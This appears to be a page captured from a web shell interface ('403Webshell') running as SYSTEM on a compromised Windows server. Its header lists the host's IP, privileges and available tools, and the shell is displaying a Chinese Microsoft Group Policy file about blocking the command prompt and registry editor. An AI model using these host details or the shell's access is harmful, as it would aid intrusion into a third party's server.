403Webshell
Server IP : 123.56.80.60  /  Your IP : 216.73.216.78
Web Server : Apache/2.4.54 (Win32) OpenSSL/1.1.1s PHP/7.4.33 mod_fcgid/2.3.10-dev
System : Windows NT iZhx3sob14hnz7Z 10.0 build 14393 (Windows Server 2016) i586
User : SYSTEM ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Windows/PolicyDefinitions/zh-CN/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /Windows/PolicyDefinitions/zh-CN/Shell-CommandPrompt-RegEditTools.adml
<?xml version="1.0" encoding="utf-8"?>
<!--  (c) 2006 Microsoft Corporation  -->
<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">
  <displayName>请在此处输入显示名称</displayName>
  <description>请在此处输入描述</description>
  <resources>
    <stringTable>
      <string id="DisableCMD">阻止访问命令提示符</string>
      <string id="DisableCMD_Help">此策略设置将阻止用户运行交互式命令提示符 Cmd.exe。 此策略设置还确定是否可以在计算机上运行批处理文件(.cmd 和 .bat)。

如果启用此策略设置,并且用户试图打开命令窗口,则系统会显示一条消息,说明设置会阻止此操作。

如果禁用或未配置此策略设置,则用户可以正常运行 Cmd.exe 和批处理文件。

注意: 如果计算机使用登录、注销、启动或关机批处理文件脚本,则不阻止计算机运行批处理文件,也不阻止使用远程桌面服务的用户运行批处理文件。</string>
      <string id="DisableCMD_NO">否</string>
      <string id="DisableCMD_YES">是</string>
      <string id="DisableRegedit">阻止访问注册表编辑工具</string>
      <string id="DisableRegedit_Help">禁用 Windows 注册表编辑器 Regedit.exe。

如果启用此策略设置,并且用户试图启动 Regedit.exe,则会出现一条消息,说明策略设置会阻止此操作。

如果禁用或未配置此策略设置,则用户可以正常运行 Regedit.exe。

若要阻止用户使用其他管理工具,请使用“只运行指定的 Windows 应用程序”策略设置。</string>
      <string id="DisableRegeditMode_UIAndSilent">是</string>
      <string id="DisableRegeditMode_UIonly">否</string>
  
   <string id="RestrictApps">只运行指定的 Windows 应用程序</string>
      <string id="RestrictApps_Help">限制用户有权在该计算机上运行的 Windows 程序。

如果启用此策略设置,则用户只能运行添加到允许的应用程序列表中的程序。

如果禁用或未配置此策略设置,则用户可以运行所有应用程序。

此策略设置仅阻止用户运行由文件资源管理器进程启动的程序。 它不会阻止用户运行由系统进程或其他进程启动的程序,如任务管理器。 此外,如果用户拥有命令提示符(Cmd.exe)的访问权限,则此策略设置不会阻止用户在命令窗口中启动程序,即使应阻止其使用文件资源管理器启动程序也会如此。

注意: 具有 Windows 2000 或更新版本证书的非 Microsoft 应用程序需要遵循此策略设置。
注意: 若要创建允许的应用程序列表,请单击“显示”。 在“显示内容”对话框的“值”列中,键入应用程序可执行文件名(例如,Winword.exe、Poledit.exe 和 Powerpnt.exe)。</string>
      <string id="DisallowApps">不运行指定的 Windows 应用程序</string>
      <string id="DisallowApps_Help">阻止 Windows 运行在此策略设置中指定的程序。

如果启用此策略设置,则用户无法运行已添加到不允许的应用程序列表中的程序。

如果禁用或未配置此策略设置,则用户可以运行任何程序。

此策略设置仅阻止用户运行由文件资源管理器进程启动的程序。它不会阻止用户运行由系统进程或其他进程启动的程序,如任务管理器。 此外,如果用户拥有命令提示符(Cmd.exe)的访问权限,则此策略设置不会阻止用户在命令窗口中启动程序,即使应阻止其使用文件资源管理器启动程序也会如此。

注意: 具有 Windows 2000 或更新版本证书的非 Microsoft 应用程序需要遵循此策略设置。
注意: 若要创建允许的应用程序列表,请单击“显示”。 在“显示内容”对话框的“值”列中,键入应用程序可执行文件名(例如,Winword.exe、Poledit.exe 和 Powerpnt.exe)。</string>
  </stringTable>
    <presentationTable>
      <presentation id="DisableCMD">
        <dropdownList refId="DisableCMDScripts" noSort="true" defaultItem="1">是否也要禁用命令提示符脚本处理?</dropdownList>
      </presentation>
      <presentation id="DisableRegedit">
        <dropdownList refId="DisableRegeditMode" noSort="true" defaultItem="0">是否禁用无提示运行 regedit?</dropdownList>
      </presentation>
	<presentation id="RestrictApps">
        <listBox refId="RestrictApps_RestrictAppsList">允许的应用程序列表</listBox>
      </presentation>
      <presentation id="DisallowApps">
        <listBox refId="DisallowAppsList">不允许的应用程序列表</listBox>
      </presentation>
    </presentationTable>
  </resources>
</policyDefinitionResources>

Youez - 2016 - github.com/yon3zu
LinuXploit